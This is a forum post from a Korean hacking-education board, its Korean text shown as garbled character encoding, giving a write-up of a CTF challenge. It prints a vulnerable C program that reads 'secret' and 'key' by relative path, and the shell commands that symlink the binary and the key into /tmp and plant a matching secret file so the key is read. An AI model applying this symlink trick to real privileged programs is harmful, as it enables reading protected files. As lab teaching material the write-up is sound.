1596, 1/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   lMaxl04
   http://lmaxl.tistory.com/
   ÇØÅ·Ä·ÇÁ ctf 5¹ø Ç®ÀÌ.

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1572 [º¹»ç]


¿ì¼± ¹®Á¦¸¦ º¸¸é º½ ¹®Á¦ÀÌ´Ù. ¹Úº½Àΰ¡...?
³»½ºÅ¸ÀÏÀÌ ¾Æ´Ï¶ó¼­ Ç®±â ½ÈÁö¸¸ ¿äûÀ¸·Î Çѹø...

---------------------------------------------------------------------------------------
is this a right file À̶ó´Â ÈùÆ®°¡ ÀÖ´Ù.
¹«½¼ ¸»ÀÎÁö ¼ÖÁ÷È÷ Àß ¸ð¸£°ÚÀ½...

Á¢¼ÓÇϸé ÆÄÀÏÀÌ 4°³°¡ Àִµ¥ ¼Ò½ºÆÄÀÏÀ» ¿­¾îº¸ÀÚ.

#include <stdio.h>

int main()
{
        FILE *fp;
        char szStr[1024];

        fp = fopen("secret", "r");
        if(!fp){
                printf("secret file error\n");
                exit(-1);
        }

        fgets(szStr, 1024, fp);
        szStr[strlen(szStr)-1] = 0;
        fclose(fp);

        if(strcmp(szStr, "tell me your secret!") == 0)
                system("/bin/cat key");


        printf("Finished.\n");
}

°£´ÜÇÏ°Ô Çؼ®Çϸé secret ¿¡¼­ Àоî¿Â ½ºÆ®¸µÀÌ tell me your secret! ¸é Å° ÆÄÀÏÀ» Àоî¶ó ¶ó´Â °ÍÀÌ´Ù. (ÀÚ¼¼ÇÑ ¼Ò½º Çؼ®Àº ¾Ë¾Æ¼­...)

±×·±µ¥ secret ÆÄÀÏ¿¡´Â
I'm a invalid secret file
À̶ó´Â ½ºÆ®¸µÀÌ µé¾îÀÖ°í Àб⠱ÇÇѸ¸ ÀÖ¾î ¼öÁ¤ÀÌ ºÒ°¡´ÉÇÏ´Ù.

±×·³ ´Ù¸¥µ¥¼­ ÀÐÀ¸¸é µÇÁö ¾Ê°Ú³ª ½Í¾î¼­ ½Éº¼¸¯ ¸µÅ©¸¦ ÀÌ¿ëÇغ¸¾Ò´Ù.

tmp Æú´õ¿¡ ´ÙÀ½°ú °°ÀÌ ÇÁ·Î±×·¥ÀÇ ½Éº¼¸¯ ¸µÅ©¸¦ °Ç´Ù.

bom@ubuntu:/tmp/max$ ln -s /home/bom/bom_owned aa

±×·³ ÀÌÁ¦ tmp Æú´õ¿¡ ´ÙÀ½°ú °°Àº ÆÄÀÏÀÌ ÀÖÀ» °ÍÀÌ´Ù.

lrwxrwxrwx  1 bom  bom    19 2010-09-18 18:35 aa -> /home/bom/bom_owned*

½Éº¼¸¯ ¸µÅ©´Â °£´ÜÈ÷ »ý°¢Çϸé ÀÎÅͳÝÀÇ Áñ°Üã±â¿Í µ¿ÀÏÇÑ °ÍÀ¸·Î
ÆÄÀÏÀÌ ¿ø·¡ ÆÄÀÏÀ» °¡¸®Å°¸ç ÇØ´ç ÆÄÀÏ ½ÇÇà½Ã ¿øº» ÆÄÀÏÀ» ½ÇÇàÇÏ´Â ÆÄÀÏÀ̶ó°í º¸¸é µÈ´Ù.

¶ÇÇÑ ¿ø·¡ ¸ñÀûÀÌ secret ÆÄÀÏÀ» Àдµ¥ ¿©±â¼­ º¸¸é Àý´ë °æ·Î°¡ ¾Æ´Ñ »ó´ë°æ·Î¸¦ ÀÌ¿ëÇØ Âü°íÇÑ´Ù.
Áï /home/bom/secret ÀÌ ¾Æ´Ñ ÇÁ·Î±×·¥ÀÌ Á¸ÀçÇÏ´Â Æú´õ ³»ÀÇ secretÀ» Àд °ÍÀÌ´Ù.

±×·¯¹Ç·Î secret ÆÄÀϵµ ´ÙÀ½°ú °°ÀÌ ¸¸µé¾îÁØ´Ù.
bom@ubuntu:/tmp/max$ cat > secret
tell me your secret!

ÀÚ ÀÌÁ¦ ½ÇÇàÇغ¸ÀÚ.

bom@ubuntu:/tmp/max$ ./aa
/bin/cat: key: No such file or directory
Finished.

½ÇÇàÀº Àß µÇ¾ú´Âµ¥ keyÆÄÀÏÀ» ÀÐÀ¸·Á°í ÇÏ´Ï ¾ø´Ù°í ±×·±´Ù.
±×·¯¹Ç·Î Å° ÆÄÀÏÀ» ¸¸µé¾îÁÖÀÚ.
À̶§µµ ¸¶Âù°¡Áö·Î ¼Ò½º¸¦ º¸¸é /bin/cat key ·Î½á Àý´ë °æ·Î°¡ ¾Æ´Ñ »ó´ë°æ·Î·Î ÆÄÀÏÀ» Àб⠶§¹®¿¡ ½Éº¼¸¯ ¸µÅ©¸¦ ÀÌ¿ëÇØ key ÆÄÀÏÀ» ¸¸µé¾î¾ß ÇÑ´Ù.

bom@ubuntu:/tmp/max$ ln -s /home/bom/key key

ÀÌÁ¦ µð·ºÅ丮 ³»ÀÇ Àüü ÆÄÀÏÀº ´ÙÀ½°ú °°´Ù.

lrwxrwxrwx  1 bom  bom    19 2010-09-18 18:35 aa -> /home/bom/bom_owned*
lrwxrwxrwx  1 bom  bom    13 2010-09-18 18:36 key -> /home/bom/key
-rw-r--r--  1 bom  bom    21 2010-09-18 18:35 secret

ÀÌÁ¦ aa¸¦ ½ÇÇàÇÏ¸é ³»½ºÅ¸ÀÏÀº ¾Æ´ÏÁö¸¸ º½µµ ³»²¨.

  Hit : 7200     Date : 2010/09/18 06:19



    
DeathStalker ¸Æ½ºÇü °í¸¶¿ö ¤¾¤¾ ´öºÐ¿¡ °øºÎ ‰ç¾î ¤¾¤¾ 2010/09/18  
ganesha °í¸¿½À´Ï´Ù Àß º¸°í °©´Ï´Ù ¤¾¤¾ 2010/09/19  
williamlee ¿À °¨»ç! 2010/09/19  
     [°øÁö] °­Á¸¦ ¿Ã¸®½Ç ¶§´Â ¸»¸Ó¸®¸¦ ´Þ¾ÆÁÖ¼¼¿ä^¤Ñ^ [29] ¸Û¸Û 02/27 19448
1595   [pwnable.kr] Shellshock[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/23 96
1594   ShellshockÀÇ ±âº» ¿ä¾à     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/23 77
1593   [pwnable.kr] fd     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/23 70
1592   VPNÀÌ ¿¬°áµÇ¾ú´Ù°¡ µµÁß¿¡ ²¨µµ À¥ ºê¶ó¿ìÀú»ó¿¡¼­ À¯ÁöµÇ´Â ÀÌÀ¯     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/22 77
1591   ÇØÄ¿µéÀÌ ÇØÅ·½Ã »ç¿ëÇÏ´Â µð·ºÅ丮 °ø°£[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/22 115
1590   Keyboard Hooking -part2 - (Python3 ver)     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/20 84
1589   [Windows API] Keyboard Hooking     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/20 74
1588   [pwnable.kr] cmd1 °ø·«     ÇØÅ·ÀßÇÏ°í½Í´Ù
10/23 236
1587   netdiscover ÆÄÀ̽ãÀ¸·Î ±¸ÇöÇϱ⠠   ÇØÅ·ÀßÇÏ°í½Í´Ù
08/13 515
1586   ÆÄÀ̽ãÀ» ÀÌ¿ëÇÑ ½ÉÇà À¥ Å©·Ñ·¯     ÇØÅ·ÀßÇÏ°í½Í´Ù
08/13 407
1585   ÆÄÀ̽ã random¸ðµâÀ» ÀÌ¿ëÇÑ ¼ýÀÚ¸ÂÃ߱⠰ÔÀÓ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/30 957
1584   ÆÄÀ̽ã äÆà ÇÁ·Î±×·¥ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/28 845
1583   ÆÄÀ̽㠼ÒÄÏ ÇÁ·Î±×·¡¹ÖÀÇ ±âÃÊ     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/26 987
1582   ¸®´ª½º À¥ ·Î±× ºÐ¼®     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/20 675
1581   ¸®´ª½º/À©µµ¿ì º¸¾È Àåºñ ·Î±×     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/20 825
1580   °í¼ö´ÔµéÀÇ µµ¿òÀ» ¹Þ°í ½Í½À´Ï´Ù     vbnm111
02/11 914
1579   ¸®´ª½º Ä¿³Î 2.6 ¹öÀü ÀÌÈÄÀÇ LKM     jdo
07/25 1430
1578   ½©ÄÚµå ¸ðÀ½     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 2306
1577   Call by value VS Call by Reference     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 1606
1 [2][3][4][5][6][7][8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org